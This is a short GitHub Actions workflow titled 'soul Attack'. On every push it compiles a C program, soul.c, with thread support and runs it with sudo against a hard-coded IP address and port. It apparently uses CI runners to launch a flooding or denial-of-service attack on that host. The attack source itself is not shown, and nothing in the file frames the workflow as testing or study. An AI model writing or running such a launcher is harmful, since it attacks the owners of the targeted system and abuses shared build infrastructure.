name: soul Attack
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v3
    - name: Compile c file
      run: gcc -o soul soul.c -lpthread
    - name: Run soul
      run: sudo ./soul 20.204.191.192 10407 80
